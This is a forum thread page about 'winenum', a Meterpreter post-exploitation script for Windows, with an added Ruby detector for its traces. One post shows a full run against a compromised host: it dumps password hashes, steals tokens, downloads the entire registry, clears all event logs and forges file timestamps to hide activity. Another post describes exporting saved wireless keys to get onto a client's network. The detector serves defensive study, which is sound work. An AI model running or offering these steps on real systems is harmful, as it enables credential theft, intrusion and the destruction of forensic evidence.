Page 2 of 2 FirstFirst 12
Results 11 to 14 of 14

Thread: Meterpreter Script for Quick Local Enumeration of Windows Hosts

  1. #11


    Updated the Script 12/14/2008
    Expanded the options of the script, plus added an option to migrate the meterpreter session, since some exploits like the browser one will die after the user closes the hung browser (the code was provided by Natron on the Metasploit mailing list), plus made dumping the registry and options
    http://www.darkoperator.com/winenum.tar.gz
    Code:
    meterpreter > run winenum -h
    Windows Local Enumerion Meterpreter Script by Darkoperator
    Carlos Perez carlos_perez@darkoperator.com
    Usage:
    
    -h    This help message.
    
    -m    Migrates the Meterpreter Session from it current process to a new one
    
    -c    Changes Access Time, Modified Time and Created Time of executables
          that where run on the target machine and clear the EventLog
    
    -r    Dumps, compresses and download entire Registry
    
    [-] Error while running command run: exit
    meterpreter > run winenum -m -c -r
    [*] Launching hidden cmd.exe...
    [*] Process 2088 created.
    [*] Current process is cmd.exe (2676).  Migrating to 2088.
    [*] Migration completed successfully.
    [*] New server process: cmd.exe (2088)
    [*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
    [*] New session on 192.168.1.147:1050...
    [*] Saving report to /tmp/192.168.1.147_20081214.405428587
    [*] Checking if WIN2K301 is a Virtual Machine ........
    [*]     This is a VMware Workstation/Fusion Virtual Machine
    [*]     This is a VMWare virtual Machine
    [*] Running Command List ...
    [*]     running command cmd.exe /c set
    [*]     running command arp -a
    [*]     running command ipconfig /all
    [*]     running command ipconfig /displaydns
    [*]     running command route print
    [*]     running command net view
    [*]     running command netstat -na
    [*]     running command netstat -ns
    [*]     running command net share
    [*]     running command net group
    
    [*]     running command net user
    [*]     running command net localgroup
    [*]     running command net view /domain
    [*]     running command netsh firewall show config
    [*]     running command tasklist /svc
    [*] Running WMIC Commands ....
    [*]     running command wimic computersystem list
    [*]     running command wimic useraccount list
    [*]     running command wimic group
    [*]     running command wimic service list brief
    [*]     running command wimic volume list brief
    [*]     running command wimic process list brief
    [*]     running command wimic startup list full
    [*]     running command wimic qfe
    [*] Dumping password hashes...
    [*] Hashes Dumped
    [*] Getting Tokens...
    [*] All tokens have been processed
    [*] Dumping and Downloading the Registry
    [*]     Exporting HKCU
    [*]     Compressing HKCU into cab file for faster download
    [*]     Exporting HKLM
    [*]     Compressing HKLM into cab file for faster download
    [*]     Exporting HKCC
    [*]     Compressing HKCC into cab file for faster download
    [*]     Exporting HKCR
    [*]     Compressing HKCR into cab file for faster download
    [*]     Exporting HKU
    [*]     Compressing HKU into cab file for faster download
    [*]     Downloading HKCU.cab to -> /tmp/192.168.1.147-HKCU.cab
    [*]     Downloading HKLM.cab to -> /tmp/192.168.1.147-HKLM.cab
    [*]     Downloading HKCC.cab to -> /tmp/192.168.1.147-HKCC.cab
    [*]     Downloading HKCR.cab to -> /tmp/192.168.1.147-HKCR.cab
    [*]     Downloading HKU.cab to -> /tmp/192.168.1.147-HKU.cab
    [*]     Deleting left over files
    [*] Clearing Event Logs, this will leave and event 517
    [*]     Clearing the security Event Log
    [*]     Clearing the system Event Log
    [*]     Clearing the application Event Log
    [*]     Clearing the directory service Event Log
    [*]     Clearing the dns server Event Log
    [*]     Clearing the file replication service Event Log
    [*] Alll Event Logs have been cleared
    [*] Changing Access Time, Modified Time and Created Time of Files Used
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\cmd.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\reg.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\ipconfig.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\route.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\net.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\netstat.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\netsh.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\makecab.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\tasklist.exe
    [*]     Changing file MACE attributes on C:\WINDOWS\system32\wbem\wmic.exe
    [*] Done!
    
    meterpreter >
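    The run above leaves two footprints a defender can look for: the event log clearing (the script itself notes it leaves event 517, "the audit log was cleared", on Windows 2000/2003; Vista and later record the same thing as event 1102) and a burst of enumeration commands launched from one process within a few seconds. The following Ruby detector is an added example, not part of the thread or of the winenum script; it runs over constructed sample records in a simplified "timestamp|host|event_id|pid|command" form, and the thresholds, field layout and the 592 process-creation id used in the sample data are assumptions for illustration.

```ruby
# Added example (not from the forum thread or the winenum script): flag, in
# constructed sample log records, an audit-log-cleared event and a burst of
# host-enumeration commands launched from a single process.
require 'time'

# Constructed sample records: "timestamp|host|event_id|pid|command".
# 592 is the Windows 2000/2003 "new process created" audit event; the command
# column is assumed to be available for this illustration.
SAMPLE_LOG = <<~LOG
  2008-12-14T10:00:01Z|WIN2K301|592|2088|cmd.exe /c set
  2008-12-14T10:00:02Z|WIN2K301|592|2088|arp -a
  2008-12-14T10:00:03Z|WIN2K301|592|2088|ipconfig /all
  2008-12-14T10:00:04Z|WIN2K301|592|2088|route print
  2008-12-14T10:00:05Z|WIN2K301|592|2088|net user
  2008-12-14T10:00:06Z|WIN2K301|592|2088|netstat -na
  2008-12-14T10:00:07Z|WIN2K301|592|2088|tasklist /svc
  2008-12-14T10:00:30Z|WIN2K301|592|3012|notepad.exe readme.txt
  2008-12-14T10:00:45Z|WIN2K301|517|0|
  2008-12-14T10:05:00Z|WKSTN02|592|1440|ipconfig /all
  2008-12-14T10:20:00Z|WKSTN02|592|1440|net view
LOG

# 517: "audit log was cleared" on NT/2000/2003; 1102: same event on Vista and later.
AUDIT_LOG_CLEARED = [517, 1102].freeze
# Executables the script above chains together during enumeration.
ENUM_COMMANDS = %w[set arp ipconfig route net netstat netsh tasklist wmic].freeze
BURST_THRESHOLD = 5   # assumed: this many enumeration commands ...
BURST_WINDOW = 60     # ... from one pid within this many seconds

Record = Struct.new(:time, :host, :event_id, :pid, :command)

# Parse the pipe-separated sample format into Record structs, skipping blank lines.
def parse_records(text)
  text.each_line.map do |line|
    t, host, id, pid, cmd = line.strip.split('|', 5)
    next if t.nil? || t.empty?
    Record.new(Time.iso8601(t), host, id.to_i, pid.to_i, cmd.to_s)
  end.compact
end

# True when the command's executable is one of the enumeration tools.
# A leading "cmd.exe /c" wrapper is stripped so "cmd.exe /c set" counts as "set".
def enumeration_command?(cmd)
  return false if cmd.nil?
  inner = cmd.sub(%r{\Acmd(\.exe)?\s+/c\s+}i, '')
  exe = inner.split.first.to_s.downcase.sub(/\.exe\z/, '')
  ENUM_COMMANDS.include?(exe)
end

# Return human-readable alerts: one per log-cleared event, and at most one per
# (host, pid) whose enumeration commands exceed BURST_THRESHOLD in BURST_WINDOW.
def detect(records)
  alerts = []
  records.each do |r|
    next unless AUDIT_LOG_CLEARED.include?(r.event_id)
    alerts << "#{r.host}: audit log cleared (event #{r.event_id}) at #{r.time.iso8601}"
  end

  records.select { |r| enumeration_command?(r.command) }
         .group_by { |r| [r.host, r.pid] }
         .each do |(host, pid), recs|
    times = recs.map(&:time).sort
    times.each_with_index do |t0, i|
      # Sliding window: count commands within BURST_WINDOW seconds of t0.
      window = times[i..-1].take_while { |t| t - t0 <= BURST_WINDOW }
      next if window.size < BURST_THRESHOLD
      alerts << "#{host}: #{window.size} enumeration commands from pid #{pid} within #{BURST_WINDOW}s starting #{t0.iso8601}"
      break
    end
  end
  alerts
end

if __FILE__ == $0
  puts detect(parse_records(SAMPLE_LOG))
end
```

    On the sample data this yields two alerts: the log-cleared event on WIN2K301 and the seven-command burst from pid 2088; the two isolated commands on WKSTN02 fifteen minutes apart stay below the threshold. The grouping by pid matters because the script launches everything from one hidden cmd.exe (process 2088 in the run above), which is exactly the pattern an interactive administrator rarely produces.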

  2. #12


    Josh Wright from InGuardians published a great paper called Vista Wireless Power Tools on the new features of Windows Vista wireless commands, plus published several tools. I added the enumeration commands to Winenum, plus it will now export the registry keys where the wireless configured networks of Windows XP and Windows Vista machines are stored; these files can be imported into the pentester's Windows box to gain access to the client's network, or to get the wireless keys using other tools after importing.

  3. #13

    Session kill

    I have found this script works extremely well, great job! Just a quick question, is there a command that could be incorporated into the script to kill the active meterpreter session once it has completed the enumeration? Sometimes preferable over backgrounding. Thanks.

  4. #14


    just append to the end

    shell.stop

    that should kill the meterpreter session
